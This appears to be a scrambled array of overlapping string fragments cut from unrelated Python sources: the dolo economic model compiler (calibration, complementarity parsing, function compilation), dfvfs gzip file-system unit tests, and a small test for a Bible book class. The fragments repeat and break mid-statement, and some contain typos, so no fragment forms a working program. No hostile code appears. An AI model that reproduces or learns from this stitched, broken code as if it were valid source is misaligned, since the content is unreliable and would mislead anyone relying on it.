self.infos['data_layout'] =", "# for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup]", "u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s +=", "'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names =", "tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k)", "s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb", "regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for", "def decode_complementarity(comp, control): ''' # comp can be either: - None - \"a<=expr\"", "in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun", "OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import", "timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v =", "elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self,", "from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict,", "residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula", ": {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss # import pprint", "pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s", "False: target_spec = None else: target_spec[2] = 'out' else: target_spec = None if", "auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd =", "in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in", "ddefs = OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t =", "[ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return tuple( [", "res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys():", "import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib", "object: ------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss =", "equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side", "vals=vals, eqs=eq) ss += \"\\n\" s += ss # import pprint # s", "as rhs - lhs def filter_equal(eq): if '=' in eq: lhs, rhs =", "[ self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames = (pname,)", "StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration =", "NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition =", "= [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i]", "calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif", "pname ] ) elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group", "calibration according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system", "[numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list):", "distribution if distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float))", "else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite", "[] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq,", "funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations", "if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle']", "options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for", "if spec.get('target'): # keep only right-hand side # TODO: restore recursive definitions eqs", "standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__", "self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname in self.symbols[g]] try:", "{} original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec =", "None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables", "self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub =", "import standard_function defs = self.symbolic.definitions # works for fg models only model_type =", "k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options if", "gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so", "= standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions", "to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import", "return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc':", "self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp)", "symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system", "else: continue if spec.get('target'): # keep only right-hand side # TODO: restore recursive", "except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r", "= standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]]", "= recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries':", "eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val", "None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols", ") elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group = [g", "fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag", "funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not", "standard_function defs = self.symbolic.definitions # works for fg models only model_type = self.model_type", "re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either:", "str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return", "= None calibration_dict = None covariances = None markov_chain = None def __init__(self,", "in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs =", "comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs", "raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in", ".function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class", "for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [", "dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs", "= self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd = OrderedDict() for", "# s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def", "class NumericModel: calibration = None calibration_dict = None covariances = None markov_chain =", "dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return", "eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss", "= comp_spec['left-right'] comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if", "for time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs", "compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]]", "evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution)", "group = [g for g in self.symbols.keys() if pname in self.symbols[g]] try: group", "str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs)", "is not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type =", "= distribution if distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances,", "'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} :", "fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions", "target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities')", "discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float))", "ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun,", "{} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq eqs =", "gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs)", "symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not in", "= evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances", "is a controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" '''", "model doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep", "in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output", "zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict()", "recipes[model_type] symbols = self.symbols # should match self.symbols comps = [] functions =", "rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value", "of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side #", "= original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\")", "spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out' else: target_spec =", "for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss", "['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args:", "import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be", "is False: target_spec = None else: target_spec[2] = 'out' else: target_spec = None", "eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq in", "a is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise", ").body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k =", "else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args):", "comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)]", "recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't", "TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in", "where a is a controls - \"expr<=a\" where a is a control -", "- type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals()", "njit class NumericModel: calibration = None calibration_dict = None covariances = None markov_chain", "numba import njit class NumericModel: calibration = None calibration_dict = None covariances =", "ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, )", "+= ss # import pprint # s += '- residuals:\\n' # s +=", "in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup)", "# print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname]", "not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of", "= comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = [] for i,eq", "from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit", "colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals}", "None covariances = None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic", "= self.symbolic.definitions # works for fg models only model_type = self.model_type if 'auxiliaries'", "eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals,", "p in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p", "= dd recipe = recipes[model_type] symbols = self.symbols # should match self.symbols comps", "enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs,", "self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if", "CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure", "= to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols # should", "self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy #", "'{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|',", "for eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value", "sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options", "{} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__()", "spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = []", "eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive')", "pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i", "eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control)", "n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output )", "for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in", "in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if", "= regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip()", "StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type]", "in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs", "self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates", "= StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols =", "covariances = distribution if distribution is None: self.covariances = None else: self.covariances =", "not in ('parameters','shocks','values')], ()) self.options = options if options is not None else", "import ast from collections import OrderedDict from .codegen import to_source from .function_compiler_ast import", "import colored s = u''' Model object: ------------ - name: \"{name}\" - type:", "self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p)", "rhs - lhs def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=')", "list): return [ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return" ]
[ "= Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\",", "nose.tools import * from bmc.book import Book def setup(): print (\"SETUP!\") def teardown():", "def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\",", "DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small():", "\"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should", "matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\",", "def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook():", "print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def", "Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22)", "(\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\")", "from nose.tools import * from bmc.book import Book def setup(): print (\"SETUP!\") def", "import * from bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR", "print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name,", "B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B =", "<reponame>reich6534/SumoPY<filename>tests/bmc_test.py from nose.tools import * from bmc.book import Book def setup(): print (\"SETUP!\")", "B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def test_smallbook(): Book(\"Obadiah\",", "def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises", "fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError)", "* from bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\")", "test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B", "from bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def", "Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def", "= Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError)", "@raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def", "(IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def", "\"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def test_smallbook(): Book(\"Obadiah\", 0)", "27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This", "B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This", "should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\")", "test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\",", "Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew =", "22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def test_smallbook():", "def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big():", "50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23,", "import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew", "bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname():", "Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0,", "= Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50)", "assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should", "\"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\")", "@raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError)", "setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27)", "test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B =", "def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B", "teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError)", "B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151)" ]
[ "None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification", "for the file system implementation using gzip.\"\"\" import os import unittest from dfvfs.path", "gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout", "used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec =", "throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file)", "None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__ ==", "context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self):", "by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def", "gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system", "os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system", "file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file", "file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout the", "get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry =", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self):", "file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system", "def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system =", "root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry()", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by", "testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the", "testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open", "implementation using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path", "the file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec =", "os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by", "def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data',", "import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\"", "dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase):", "import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the", "file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__ == '__main__':", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry", "system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\"", "\"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from", "dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs", "os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver", "object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context", "testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists 